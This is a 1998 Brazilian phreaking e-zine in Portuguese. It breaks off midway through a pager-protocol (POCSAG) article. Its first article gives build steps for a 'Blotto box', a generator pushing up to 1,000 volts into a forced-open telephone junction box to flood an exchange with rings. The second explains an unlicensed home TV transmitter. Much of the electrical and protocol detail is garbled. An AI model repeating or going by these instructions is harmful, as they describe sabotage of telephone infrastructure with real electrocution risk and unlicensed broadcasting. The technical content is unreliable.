The Phone9 Communications Systems
reg - (c)1998, productions
All rights reservaded

					..:[the]:..
	 										 
	 	sS$$Ý$$Ss  sS$     	   :!:		     sS$Ý$Ss 
	     $$$     $$$ $$$Ý$$$ sS$Ý$Ss $$$iiiip, sS$Ý$Ss  $$$   $$$
	      sS$$Ý$$Ss  $$$ $$$ $$$$$$$ $$$"`"$$$ $$$ $$$   $$$Ý$$$ 
	      $$$$	     $$$ $$$ $$   $$ $$7   ly$ $$$sÝÝÝ      $$$        
	       $$$	     $$$ $$$ $$$$$$$ $$b   d$$ $$$ ,::     $$$         
	        $$	     $$$  $$ sS$Ý$Ss $$$$ $$$$ $$$s$$$   .$$$          
						
				     ..:[systems]:..                        

============================================================================
[	     ------> Today , on the late night phone9 show <------ 		   ]
============================================================================

			 :>The Phone9 Table of Contents<:

 1:> Editorial & copyright 
 2:> floodando a base de uma central 
 3:> Construindo uma estacao de tv 
 4:> POCSAG, informacao de sistema 
 5:> Sistema IPoS 
 6:> Falha no tempo de comunicacao digital x analogica  
 7:> b0g no sistema CMEA de celulares 01
 8:> Tricks of The Trade!
 9:> Info-seeker - GSM Systems
10:> 9labs projects
11:> PIC hack
12:> SUiD Shell System
13:> Exclusive - *DDI BOX* - by Acid branch
14:> Estrutura net2phone - Parte I
15:> Phone Phucker Philes
16:> D-END



		Total : 215k.

[:> editorial & copyiright ................................: phone9'cast <:]
			
			Editor in chief : The blood root
		   Co-editor in chief : Puruca & Primal Phear
		     Editor executivo : Phineas Phreak
                rebelde sem causa : Acid branch 
		             Mascote9 : The dert
		    relacoes publicas : Primal Phear & The blood root
			Official e-mail : phone9@puruca.com.br
		       Official Page9 : www.puruca.com.br/phone9

Comentarios e artigos : phone9@thepentagon.com

broadcast by - The Puruca's Web page
Phone9 Research systems by - Phone9

Distro site & download center...
--------------------------------

http://fly.to/txt						  .TXT homepage
http://www.puruca.com.br/phone9			  .The Phone9'main site
http://members.xoom.com/phone9			  .Mirror site
http://www.puruca.com.br				  .Fucking 31337
http://www.outzone.net					  .The Outzone Network
http://www.microsoftz.com				  .Micr0softz Corporation

	The Phone9 Technical Report vol. 01, No.00, 1o. de maio, de 1998.
	Todo o conteudo esta (c) copyright para The Phone9 Communications 
	Systems. Todos os direitos reservados . A copia deste documento eh
      expressamente proibida , soh podendo ser retirado algo daqui , sob
	um documento escrito pelo editor in chief e/ou pelo autor do texto.
				[ hmmmm....! k0ol! ]

(c) The Phone9 Systems - All Rights Reservaded
1.junho.1998, by The Phone9 Research Center
phone9@thepentagon.com
	
2:> editorial (alguem tem q fazer isto)_<:

	Senhoras e senhores , /{-rads e muleks , criancas e bebes , Tia paula,
bem vindo ao Phone9 Technical Report , um documento q sai quando nos 
podemos faze-la .
	 Phone9 eh uma colaboracao sem fins lucrativos e somente informativos 
com o intuito de mostrar o caminho das pedras para todo mundo q ler este 
documento , estamos devolta , de um certo modo sim , estamos em modus 
operandiz > sim , e pelo o q me diz , ateh q alguma galinha rebelde apareca 
e comece a bicar os nossos pes (bah!) . Nosso intuido eh soh mostrar a 
informacao e nao ensinar um monte de muleks a mandar nuke , seja como for, 
nos nao estamos nem  ai para quem vier , e sim estamos interessados em 
qquer um q nos ajude a escrever a zine , mas lembre-se mensagem muito 
complexas como "Me ajudem eu sou um lamer" , ou entao o simplorio mail 
"Eu quero contribuir com a zine , mas vc teria q me ensinar tudo!" , ai eh 
muito para uma pessoa normal , seja um pouco original , lamah!
	O q vc esta prestes a ver , simplesmente expressa a liberdade de 
expressao , qquer ato pode ser atribuido nao a nos e sim a quem o fez , se 
tiver algum problema com isto , por favor , mail me , eu sou resonposavel 
por meus atos , dammit!

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
:> 		Our ph0xin' crew - We represent your phear			  <:
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
			  ___                    ___
			__\ /__                __\ /__
                  \ 0 o /                \ o 0 /
                   \u / \                / \ u/
                   /__\ / 		     \ /__\
 	             \___/  phone9()'screw  \___/
				   MINI MONKEY
				     WE ARE
				     Phone9

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
:>		    Our ph0xin' crew - We represent your phear			  <:
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> floodando a base de uma central ....................: The blood root <:]

1) O sistema .:

	Vc nunca ouviu falar de uma conhecida box americana , chamada Blotto
Box !? Esta box , simplesmente conseguiu o q ninguem jamais tinha antes 
feito , conseguir floodar de "trimmsss...!" consecutivos de cerca de 2 em
2 segundos uma central telefonica inteira , isto inclui numero de xxx-0000 
ateh xxx-9999 , o unico meio de conseguir parar este flood era simplesmente
cortar a linha onde foi instalado o dispositivo .
	Embora , o mito das boxes nao funcionam no brasil , ainda exista na
mente de muitos e muitos , chega-se a conclusao de q varias e varias boxes
podem ser usadas no brasil , com algumas simples modificacoes dentro do seu
formato basico ,sem mudar o seu objetivo , o q eh a unica coisa q presta .
	

	1.1) O inicio .:
	Como vcs jah devem ter percebido , um telefone opera basicamente assim
quando um telefone toca , eh enviado uma pequena voltagem , pela linha 
telefonica , quando esta chega no telefone , ela aciona um dispositivo 
sensivel a energia e assim ela soa um sino , q consequentemente faz um trim,
trim no telefone . A blotto box consiste nisto , fazer com q o telefone 
receba tantas voltagens na sua linha , q quando ele chegar ao telefone , 
este estara pedindo clemencia para q ele pare de tocar , e ainda pode rolar
alguns choques de 50 a 90 volts , q a pessoa encostar em um telefone 
premiado (criancas nao tentem isto em casa , somente com a supervisao de um
adulto louco o suficiente de ler esta zine! :p), bom , o q ele faz , 
simplemente , o unico meio de se tirar esta b0x , eh desligar a central , 
deshabilitar qquer tipo de voltagem na linha , ou seja , deixa o telefone 
mudo , dali as voltagens serao em vao , e nao terao fim , depois disto , eh
soh vc desligar o "criador de voltagens" q esta em algum lugar e pronto , o
sistema opera denovo , mas mesmo assim eh muito irado .

	Se vc gosotu do q ouviu ateh agora , continue lendo , mesmo sabendo q
a morte neste projeto eh bem possivel , mas phoda-se nao eh comigo !

2) Material necessario .:
            
	O material necessario , eh um pouco fora do seu Phreak Kit de sempre ,
mas nao custa nada vc arruma-los , mesmo q seja por um dia ou dois .

	- Um gerador (bateria), agora nos estamos falando de algo grande e de
	  muita voltagem , um gerador para uma lancha de cerca de 30 cm ,
	  deve funcionar
	- Um resistor de 400 volts , e vc ainda tera q ajeitar a sua saida 
	  para um fio telefonico (coisa facil nem esquenta... ;p)
	- Um medidor de voltagem , ou um aparelho q faca isto separadamente ,
	  seria de grande utilidade , soh para evitar algo como , `a ira de 
	  deus`
	- Uma caixa de verificacao (ou armario , ou trocinho da telebras , 
        tanto faz , aquilo eh q sera o alvo de ataque , ps : use o sistema
	  conectel ou entao o sistema S-conect para conseguir plugar um fio
	  telefonico na caixa de verificacao
	- Um soldador e um ferrinho de soldagem tbm eh de muita ajuda para o 
	  caso .
	- Algum interuptor , liga por meio de fio (seguro ?) ao gerador ,para
	  vc nao ter q chegar tao perto do gerador e morrer eletrocutado !?

3) A construcao

	A construcao eh mais obvia do q saber a uma buceta encaixa no seu peru
eh bem simples , veja , primeiro , vc tera q , obviamente , arrumar todas
essas coisas , um gerador etc... . Depois q vc conseguir tudo isto , fica 
bem mais facil conseguir o resto . Primeiro , ache uma caixa de verificacao,
nao seja burro qe nem ao Dert q resolve testar a bloto box na caixa de 
verificacao do nosso bairro , mas deixa , ele eh assim mesmo .
	Pegue uma caixa de verificacao , q como todas , estah sempre aberta,
ou arrombada , depois , ache os fios de sempre (verde e vermelho) e plugue
um jacare nos dois fios , ou seja , faca o processo normal de free call .
Agora pegue o seu resistor de 400 volts (nao fique com medo!) tire-o o seu
marcador normal , e coloque ele para 1.000 volts (eu acho q estah eh uma 
voltagem razoavel para o projeto ou entao para a morte , quem sabe ;p), 
agora eh soh vc juntar tudo , e deixe o limite do resistor de 1.000 volts ,
e plug o fio do telefone na caixa de verificacao , vai ficar mais ou menos
assim :

      [CA]:> ---------- [T]:> -------------- <:[R]:> ---------- <:[G]:
	
Sendo :
CA = Caixa de Verificacao
T = Telefone
R = Resistor
G = Gerador
-- = Fios e linhas telefonicas .

	Depois de todo este cricuito estar setado , tudo fica mais facil , 
agora pegue o fio telefonico , tire o rj-11 , e solda direto os dois fios 
verde e vermelho da caixa de verificacao , com os seus dois fios , agora , 
eh tudo oK. , ligue o gerador por meio de um interuptor e voilà , vc acabou
de floodar "permanentemente" ateh q te parem , uma caixa de verificacao , 
inteira .

4) Teoria

	A teoria da box , eh a mais banal possivel .:

	Uma telefone eh acionado , como vc jah de ter percebido , por meio de
uma certa voltagem , enviada pelo linha , esta acionacao , eh simplesmente
fazer com q o telefone faca o conhecido "trimm ... trimm" de sempre , agora
imagine se a central de desregulasse e ficasse enviando durante cada 2 
segundos uma voltagem de no maximo 1.000 volts e no minimo 400 volts !? O 
telefone entraria em colapso , e assim fariam todos os telefones da sua area
ateh q alguem tire o gerador da caixa de verificacao , outro meio de se 
desativar esta b0x ,eh bem simples , procure a linha na qual o gerador estah
conectado , depois q vc descobri-la eh soh ir na central de desativa-la , 
mas o problema eh , nao eh possivel desativa-la nem pelo poste , e nem pela
caixa sem levar no minimo 700 volts nas maos , entao , o processo soh pode 
ser feito , eletronicamente , ou entao tirando toda a energia do bairro ou
somente do lugar onde estah a caixa , ou para os mais espertinhos , tire o 
gerador da tomada (para quem nao entendeu , eu fui sarcastico ;[ !).
					  
5) Projeto .:

	Como a maioria dos shitnerdz q estao lendo esta porra , devem ter medo
de brincar com a morte , eu estou desenvolvendo um sistema q faz um 
flood na central , baseado em menos volts em um sistema menor e mais light ,
talvez saia na proxima edicao , quem sabe...

The blood root - reg 1998, (c) The Phone9 Systems - [ PCS ]
Floodando a base de uma central no brasil 
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Construindo uma estacao de tv ......................: The blood root <:]
1) Introducao .:

	Vc nunca quis ter o seu proprio canal de tv ? poder se comunicar com a
massa por meio de um sistema q pode ser feito em casa ? E q concerteza nao 
eh muito caro, mas pode dar muito trabalho para conseguir desenvolver , mas
quando estiver pronto , vcs irao sentir a nossa furia e aprender um pouco
sobre como eh possivel dominar o q eles jah dominam .
	Este sistema nao foi desenvolvido inteiramente por mim , existem 
muitos amigos meus q estao por traz das cameras e q me deram uma forca ao 
iniciar este projeto .

	Eu comecei a pensar neste projeto , quando eu vi um filme q passou na
globo (arg..!) "Fique ligado na antena parabolica" em ingles "Stay Tunned",
o filme se baseava em uma carinha q trabalava para uma emissora de tv q a 
unica pessoa q via ela , era o diabo , entao eles instalavam a antena na 
casa de um individuo viciado por tv (ele me parecia gay , ao invez de comer
a mulher dele , ele ficava vendo tv :p), e a antena parabolica sugava ele p/
dentrop da teve do diabo, e este tinha um filho q logo no 
inicio do filme me inspirou as ideias , ele entrava dentro do circuito de tv
aberto (uhf) e fazia uma transmissao ao vivo para a casa , bom , agora o q
parecia tao escroto e mentiroso , se tornou o nosso proximo algo , construir
uma mini-estacao de tv em bandas UHF , soh para te lembrar , eu nao acredito
q seja dentro da lei fazer uma transmissao de tv mesmo em bandas livres(uhf)
de um jeito ou de outro , phuck y0 , eu nao sei quais sao as leis , entao 
faca se quiser , e vamos em frente !

2) Consideracoes .:

	Bom , vc ira precisar de alguns materiais :

- Uma video-cassete , uma camera com saida para conectar ao video .
- Um radio (opcional , dependendo de ateh onde vc quer atingir a sua 
estacao de televisao) este deve operar em no minimo uma frequencia de 6MHz ,
tbm seria otimo se vc tivesse uma antena em RF para melhorar a transmissao
entre o video e a antena . Tbm ajuda se o radio operar em UHF , senao pegue
uma fa'ca vc mesmo .
- Fios , sabe aqueles fios q aqueles tecnicos de tv acabo (net,TVa) usam ,
entao fazer a conexao cerca de 6 ou 7 metros dele , este fio deve tbm ser 
igual a conexao padrao conetor da banda UHF .
- Uma tv q tenha conector para UHF , e q tbm tenha um F-connector (depois eu
explico!.. :p)
- Se vc nao tiver uma antena de 6Mhz , basta ler mais abaixo em notas e 
consideracoes finais , q eu ensina a construir uma .

	Usando uma camera com saida RF :

[VCR/RF]F--------------------[Amplificador linear]------------------[Antena]
	   Transmissao em RF				    Transmissao forte
                                                         do RF

	Usando um modulador externo operando em RF :

[VCR]R----------R[MODULADOR em RF]--------[Amplificador linear]-----[Antena]
	 video 		        Transmissao                    Transmissao
						 RF				   forte do RF

Diagrama :
R = Conectores RCA (stereo).
--- = Qualquer fio ou cabo para comunicacao entre dois extremos .
[xx] = Qualquer aparelho ou dispositivo q seja usado .
F = F-connector


3) Instalacao

	Caso vc ainda nao tenha entendido como se instala !? (Vc eh burro!?)
entao , nos iremos explicar para vc como eh q se faz para instalar e usar a
sua estacao de tv.

	Primeiro , fique em mente q uma tv em UHF ou VHF trabalha em uma certa
frequencia , primeiro escolha uma frequencia  existem varios e varios 
documentos sobre isto , eu estou pensando em compilar uma lista imensa com
quase todas as fequencias VSATS e SBTS :p
	Depois de vc ter achado uma frequencia q preste , vc tera q fazer toda
aquela juncao entre materiais , primeiro , vc pode faze-la de dois jeitos :
1. Com o modulador em Radio-Frequency externo , ou interno , agora vamos 
seguindo , pegue um fio daqueles dos tecnicos da net e plugue no seu VCR ou
camera de video , e depois de fazer uma conexao direta entre o seu VCR e o 
transmissor RF q pode ser um radio-amador ou um computador ,ou ateh (segundo
uns amigos meus)mesmo eh possivel usar o fio q passa por debaixo da terra 
de empresas como net e outras do genero , somente para criar uma conexao 
direta via satelite (mas isto eh outro episodio... ), depois q vc ajeitar
este juncao , ligue o seu radio-amador em uma frequencia q vc ache q 
funcione como UHF ou VHF (eu irei colocar uma lista imensa na proxima 
edicao!), tbm eh sempre bom ligar o som stereo no video e dali vc liga aonde
vc quiser , direciona a antena e pronto , vc jah tem a sua tv caseira , 
abaixo vai uma muito pequena lista de canais e frequencias *PADROES* de 
televisao :


Canal  Frequencia Video    Som   Antena
=====  ========== ======  =====  ======
 2      54-60     55.25   56.75  8.47m
 3      60-66     61.25   65.75  7.64m
 4      66-72     67.25   71.75  6.95m
 5      76-82     77.25   81.75  6.05m
 6      82-88     83.25   87.75  5.62m
 7     174-180   175.25  179.75  2.67m
 8     180-186   181.25  185.75  2.58m
 9     186-192   187.25  191.75  2.49m
 10    192-198   193.25  197.75  2.42m
 11    198-204   199.25  193.75  2.34m
 12    204-210   205.25  209.75  2.28m
 13    210-216   211.25  215.75  1.21m

4) Consideracoes finais .:

	Bom , agora q vc jah tem pelo menos a introducao basica de como 
funciona um sistema "caseiro" de tv , eh soh vc faze-lo . PS: Grave uma fita
e passe para .avi ou .mpeg ou ateh .ram , e mande para nos q nos iremos 
colocar no .zip da zine .

The blood root - reg 1998, (c) The Phone9 Communications Systems - [ PCS ]
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> POCSAG, informacao e sistema .......................: The blood root <:]

The POCSAG guide 
(c) The blood root - The Phone9 Systems [ Made In brasil ]

0 - INDEX

	1 - Introducao 
 	2 - Sistema tecnico
	  2.1 - Consideracoes iniciais
	  2.2 - Enderecamento e rotulacoes
	  2.3 - Estrutura de bits no POCSAG
	  2.4 - T h e  B a t c h e s
            2.4.1 - Decimo Setimo Bit
	  2.5 - Formato da mensagem	  
      3 - O pager
	  3.1 - Interpretacao de codewords do pager
	4 - Aspectos a nivel POCSAG
	  4.1 - D-F.O.
	  4.2 - MCS , Message Codeword Structure 
	  4.3 - Idle Codeword
	5 - Conclusao final
	
 		>>--------------[ POCSAG ]----------------<<


1) Introducao .:
   ^^^^^^^^^^ ^^

	O POCSAG assim como um TCP/IP , eh uma suite de protocolos q trabalham
dentro do sistema de comunicacao de pagers , sao eles q levam e trazem qquer
informacao destinada a um pager . Sendo uma abreviacao ,o termo POCSAG quer
dizer "Post Office Code Standarization Advisory Group" , o POCSAG eh o mais
usado de todos os protocolos (q sao uma imensa familia de 3 ;p). Sendo 
padronizado pela FCC e pela TIA , como o principal e melhor protocolo de 
transferencia para dados via pager . O POCSAG , alvo deste nosso debate ,
foi a pouco tempo violado , ou seja , o grupo l0pht , conseguiu com as suas
t3k33n1ks , quebrar a encriptacao virtual dos pacotes transmitidos pelo 
POCSAG , e eles tbm desenvolveram uma nova carreira de softwares e um kit de
sobrevivencia Pager (heh!), para conseguir entrar dentro das mensagens de 
outros pagers , eh por isso q eu resolvi argumentar a seguranca e sistema
deste protocolo .
	
	O POCSAG , nunca foi um exemplo de seguranca , tanto q no inicio fora
habolido do uso , devido a facil encriptacao da qual ele usava , depois de
1 ano ou dois , lancaram o novo modelo de POCSAG , para sistema digital de
pagers , agora sendo considerado um dos protocolos mais seguros no mundo , 
inteiro , assim disseram os tecnicos da NEC "O POCSAG realmente revolucionou
o mundo dos pagers , impondo um sistema robusto na encriptacao e solto e 
soave dentro da encriptacao!", ele jah foi avaliado por varios e varios 
especialistas e todos concordaram com a tese dos tecnicos da NEC .
 
2) Sistema Tecnico .:
   ^^^^^^^ ^^^^^^^ ^^
	O sistema tecnico do POCSAG abrenge como na maioria dos sistemas de 
transmissao , dados como bauds , bits , bits por Segundo , frequencias , 
Mhz e por ai vai , eh isto q nos iremos descutir nesta secao!

2.0) Consideracoes iniciais .:
     ^^^^^^^^^^^^^ ^^^^^^^^ ^^
	Tome nota , estas sao as configuracoes basicas (defaults) de um 
sistema POCSAG , recem instalado , eu insisto em dizer q todas estas 
configuracoes , com excessao de trafego de bits , podem ser mudadas para
numeros maiores ou menores , ai fica ao dispor de quem operar o sistems .
	
     - 1200 ou 2400 bauds , ao contrario dos 512 bauds , lembrando q existem
       POCSAG's q usam 600 bauds ou ateh mesmo 512 bauds , ai fica mais uma
       vez a dispor do dono do sistema .
     - Trabalha em um frequencia , alternada controlada por meio de um 
       modulador , este q fica dentro de um aparelho , q nos podemos chamar
       de servidor da cede do pager. Geralmente trabalha nas frequencias p/
       o link entre o pager e o POCSAG em 465.xxx Mhz ateh 466.xxx Mhz .
     - Usando link de no maximo 1 megabyte por segundo , para o uso de 
       multi-usuarios , geralmente usa um modesto link de 512 a 1200 bps .

2.1) Enderecamento e rotulacoes .:
     ^^^^^^^^^^^^^ ^ ^^^^^^^^^^ ^^

	Esta eu considero a parte mais chata de todo o texto , e de todo o 
POCSAG , simplesmente , eh a fase de 1 bits para aquilo , 2 bits para isto ,
faz uma chave de 13 disto , etc.. :p Mas vamos lah .

	Como vc jah deve ter percebido ,o POCSAG , deve ser transmitido por 
meio de pequenos pacotes , contendo cada um , uma data e especificacao ,
diferente .
	Usando um codeword de 32 bits , ele mantem uma transmissao quase q 
automatica , de codewords , pelo menos durante uns 30 segundos (o q eh muito
na hora de transmitir uma mensagem em pagers). A estrutura basica destes 32 
bits eh :
OBS.: Cada numero q aparecer eh 1 sobre 31 bits do total da chave , sendo 1
bit q completaria os 32 bits , como somente inicio e fechamento de 
transmissao .
    
      /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\
	:------------------------------------------------------------:
	|	Utilidade		|  bit  | Comentario dispensavel 	 |
      :------------------------------------------------------------:
	|     Codeword		|  1/31 | Eh o bit de inicio do      |
	|				|	  | codeword -> BuRn!...	 |
	:------------------------------------------------------------:
	|  Inicio de mensagem   | 11/30 | Eh usado para iniciar uma  |
	|				|	  | transmiisao de mensagem    |
	|				|       | via codeword -> PocSag	 |
	:------------------------------------------------------------:
	| Endereco do codeword  | 0/30  | Eh somente um bit de       |
      |                       |       | checagem , nao esquenta nao|
	:------------------------------------------------------------:
	| The Batches		|gp16/30| Eh o grupo de data do code |
	|				|	  | word , muito importante :p |
	:------------------------------------------------------------:
	| Sistema padronizado   |gr17/30| Sistema de padronizacao de |
	| sincronizado de frames|       | frames , estrutura do texto|
	:------------------------------------------------------------:
	| Recipiente do frame   |21/30  | Dentro do gr17/30 ou       |
      |				|       | gr16/30 , existe um sistema|
	|				|	  | firmamento do endereco p/  |
	|				|	  | onde o frame de 16(17) bits|
	|				|	  | ira -> The Batches , :p	 |
	:------------------------------------------------------------:
	| Formatacao do endereco| 21/30 | Sistema de estruturamento e|
	| do pager			|       | alocacao virtual do		 | 
      |                       |       | endereco do pager.         |
	:------------------------------------------------------------:
	| Mapeamento do endereco| 13-30 | Mapeamento do endereco do  |
	| do pager			|18 bits| pager -> nada mais a dizer |
	:------------------------------------------------------------:
	\____________________________________________________________/ 
	
	Eu acho q por meio de bits , isto eh o basico , e jah dah para vc 
ter uma ideia bastante fixa de como funciona o sistema de bits dentro do 
pager .
	Mas de qquer modo .


2.3) Estrutura de bits no POCSAG .:
     ^^^^^^^^^ ^^ ^^^^ ^^ ^^^^^^ ^^ 

	Jah vou logo avisando q eu vou evitar falar sobre o batches , logo de 
inicio , mas eu terei q tocar neste assunto mais tarde , portanto eu vou 
tentar amaciar a queda o melhor possivel ;p.

	Para comecar a unica parada q importa no POCSAG eh o codeword , q eh 
de 32 bits . Sendo assim a parte mais importante destes 32 bits eh a 
transmitida logo apos da inicializacao do link . A data , conhecida como NZR
utiliza novamente a frequencia 512 hz para fazer o link , esta usa o output
do pager e o input do POCSAG para conseguir introduzir os seus "comandos"
dentro do sistema , sendo SEMPRE comecada com um "msb".
	
	O bit do msb , indica q o codeword , eh um endereco (o do pager!), 
ou entao q esta eh uma mensagem (31 = 1).
	A estrutura de mensagem codeword (31 = 1), usa de inicio 20 bits 
tirados dos 30 bits , menos o 1 de especificacao de uma mensagem em codeword
entendeu.. ;p tbm usando os bits 11 e 12 , para indicar como eh a estrutura
da mensagem . Bits entre 10 e 1 sao os bits q instalam o sistem BCH (cujo o 
endereco eh 31 bit e 21 bit)e ainda bloqueiam o ECC , q eh enviado junto com
o NZR , para nao permitir q qquer codigo indevido possa passar , este age 
como um filtro para o pager e sua transmissao .
	Soh para lembrar , o codigo do BCH eh : x**10 + x**9 + x**8 + x**6 
+ x**5 + x**3 + 1.

2.4) T h e  B a t c h e s .:
     ^ ^ ^  ^ ^ ^ ^ ^ ^ ^ ^^
	Eh aqui q mora a diversao , os batches , o q sao os batches ? Os 
batches sao as mensagens , divididos em grupos de 16 (variando entre 17 as
vezes .. veja abaixo), eles assinalam , o sincronismo do frame , assinalam o
formato do texto e ainda ageitam em conjunto com o pager , a introducao da
mensagem dentro do pre-formato do pager .
	
	Iniciando com uma conexao de no minimo 512 bps , os batches , procuram
sempre serem enviados no meio da transmissao , sendo assim "escolatado" pelo
resto do POCSAG . Depois de ser comecada a transmissao de bauds em 512 e de
bps em 512 tbm , inicia uma sequencia massiva de 16 series , como endereco,
data ,q se organiza assim :

	endereco
	data
	endereco
	data
	endereco
	data

	Assim se repete 16 vezes , ateh o fim da transmissao dos batches , nao
podendo de se dar o luxo de fechar a conexao depois da ultima dada 
transmitida , estes 512 bauds , sobem para 1200 , quando esta sendo enviado
o ultimo bit da transmissao dos batches , assim nao permitindo q 
repentinamente seja descarregado uma voltagem incerta dentro do pino 1 , o q 
desligaria as funcoes correntes no transmissor . 
	Depois de comecar uma transmissao codeword , jah na parte em q eles 
sao transmitidos em 16 bits , eh necessario saber q o codeword do sync para
o bloqueio e desabilitacao do filtro em hexa eh de 0x7A89C197.
	
	Quando sao divididos os 16 bits , estes sao separados em dois grupos, 
cada um com 8 bits de tamanho q sao distribuidos em dois canais , sendo q 4
bits sao ignorados , pois sao algo como uma sondagem e confiracao de 
endereco , estes sao o 0 e 1 , o 7 e o 8 . Assim , os pagers soh prestam 
atencao a parte da transmissao , salvando boa parte da bateria .
	
2.4.1) Decimo Setimo Bit .:
       ^^^^^^ ^^^^^^ ^^^ ^^
	Talvez este assunto nao mereca um topico completo , mas ele eh uma boa
excessao a regra de 16 bits de codeword , quando uma mensagem excede o 
padrao estipulavel pelo operador do sistema , talvez seja necessario usar um
17 bits de codeword , para conseguir se ter uma transmissao com menos erros,
com o uso do 17 bit , a conexao fica mais ou menos assim :

	
			      /¯¯¯¯¯¯¯¯¯¯¯¯¯¯\
			      |    17 bit    |
		            \______________/
		  	          / /    \ \
		               / /      \ \
	           /¯¯¯¯¯¯¯¯¯¯¯¯¯\ /¯¯¯¯¯¯¯¯¯¯¯¯\
		     | Dividido em | | Dividido em|
		     | 2 grupos de | |2 grupos de |
		     | 7 bits	 | |7 bits      |
		     \_____________/ \____________/
			/ /                     \ \   
		     / /                       \ \
               /¯¯¯¯¯¯¯¯¯¯¯¯¯¯\  /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\
		   | Usando 2 bits|  | Usando 2 bits |
		   |um no inicio e|  | um no inicio e|
		   |um no final   |  | um no final   |
		   \______________/  \_______________/
		     \  \                   /  /
		   /¯¯¯¯¯¯¯¯¯¯¯¯¯¯\  /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\
		   | Usando 5 bits|  | Usando 5 bits |
		   | de frames    |  | de frames     |
		   | divididos em |  | divididos em  |
		   | 1 grupo soh  |  | 1 grupo soh   |
		   \______________/  \_______________/

	Bom , vamos a teoria :
	A conexao usa 17 btis de codeword , destes 17 bits , sao tirados duas
partes de 7 bits , o q somando da 14 bits . Este 14 bits se dividem em dois 
grupos de 7 , destes 7 , sao usados dois bits , um no inicio ,para chegar a 
autentificidade do endereco , e depois , para constatar q a conexao fora 
totalmente entregada . Voltando aos 17 bits , sobram 4 bits de bobeira , 
dois bits para o monitoramento (e procura de erros)de data vindas do 
codeword e mais dois bits para o monitoramento a procura de perca de data .
Assim eh completada uma chave de 17 bits , diferente da estrutura normal dos
batches q usam 16 bits (para mensagens pequenas)

2.5) Formato da mensagem .:
     ^^^^^^^ ^^ ^^^^^^^^ ^^

	Existem dois formatos de mensagem q podem ser usados em um POCSAG ,
um q usa o padrao BCD e o outros q usa uma ASCII de 7 bits . O modo BCD 
codfica os seus pacotes em 4 bits , podendo transformar o codeword em bits 
de 30-11. As partes mais importantes de todo o BCD sao os bits 30 , 29 , 28
27 . Os valores mais importantes sao codificados assim .:

	0xA	Reserved (Sao datas de aderessamento e coisas do genero ;))
	0xB	Caracter U (para pagin' urgentes!)
	0xC	" ", Espaco em Branco
	0xD	"-", Hifen ou qquer outro caractere especial
	0xE	")", Lado esquerdo da mensagem
	0xF	"(", Lado direito da mensagem	
 
	Agora , existe uma questao q eh bem estruturada , quando eh enviada
uma mensagem em formato BCD , eh necessario se completar todos os bits , q 
sao designados a mensagem , para fazer isto , eh usado um sistema chamado de
BSC (Blank Space Character) q quer dizer , Caractere para espaco em Branco ,
o q ele faz , simplesmente , preenche os bits q faltam da mensagem por 
pequenas introducoes 0xC , q eh : " ", Espaco em branco .
	
	A mensagemn ASCII de 7 bits , eh totalmente diferente em meio de 
estrutura do modo BCD , o modo ASCII-7 bits, usa 20 bits de codeword , mas
como existia uma taxa padrao , dizendo q para um codeword de 7 bits , era
necessario se usar 21 bits , mas este 1 bits a mais diminuiria a velocidade
de transmissao , diante disto , nao foi duvida nenhuma , encurtar o 
monitoramento de pacotes , para conseguri mais velocidade ao transmitir .
Podendo receber mensagens alfanumericas , o ASCII-7 bits , eh o modo mais
usado de envio de mensagem . A estrutura final do sistema de pagin' eh 
bastante remota , podendo acabar em dois metodos ETX (End of TeXt) ou entao
EOT (End Of Transmition).

3) O pager .:
   ^ ^^^^^ ^^
	Neste topico , nos iremos discutir aciduamente , como e quais sao as
reacoes do pager , diante das transmissoes via POCSAG e toda a estrutura
de enderecamento e armazenamento por parte do pager !

3.1) Interpretacao de codewords do pager .:
     ^^^^^^^^^^^^^ ^^ ^^^^^^^^^ ^^ ^^^^^ ^^

	Bom , depois de transmitir uma mensagem eh bem dificil dizer ao certo
o q acontece com esta , ou pode ser lida , ou pode ser ignorada , ou pode 
ser deletada , mas como funciona este armazenamento , basicamente eh bem 
simples .

	O pager recebe as informacoes por uma antena receptor (RCT), esta 
antena devido a aspectos fisicos , fica dentro do pager , mas como eh 
assinalada para operar em somente um canal , sem um modulador pre-instalado,
para a alteracao do canal , chegasse a conclusao de q estas antenas , 
somente usam uma base , podendo captar os sinais de larga faixa de central
do pager , enderecados a sua localidade . Esta antena (interna?), esta 
ligada por meio de solda a uma PCB (PCboard para os leigos!), esta PCB 
possui em seu circuito uma otima EEPROM (Eraseble Eletronic Progammable 
Read-Only-Memory), esta sendo o coracao do pager , possui dois pinos basicos
pin 1 e pin2 , o pin 1 eh designado como input , e o pin 2 eh designado como
output (ver mais abaixo!).
	O input , ira receber , interpretar e armazenar os comandos ou ateh 
pagin' q forem enviados para aquele endereco , o armazenamento na memoria ,
tem parte baseado no POCSAG , de um modo , ele utiliza parte dos dados do 
POCSAG , para ter uma ideia basica de como se estrutura a mensagem , entao
vamos entede-lo melhor ;p

	Eu recebo uma codeword via POCSAG , depois de recebe-la dentro dos
frames de 16 bits (divididos em dois!)vem as seguintes instrucoes :

		"0xA 0xE (hahahahahaha!) 0xF 0xC 0xA EOT"

OBS.: Eh mais ou menos assim eu mostrei muito pouco detalhado , mas tah 
servindo para o q eu quero mostrar .

	Otimo , entao foi mais ou menos isto o q aconteceu :

1 - Sao enviados as datas antecessoras , como checagem de endereco , etc..
2 - 0xE Eh estipulado a margem esquerda da transmissao
3 - Mensagem
4 - 0xF , designa o lado direito do pagin'
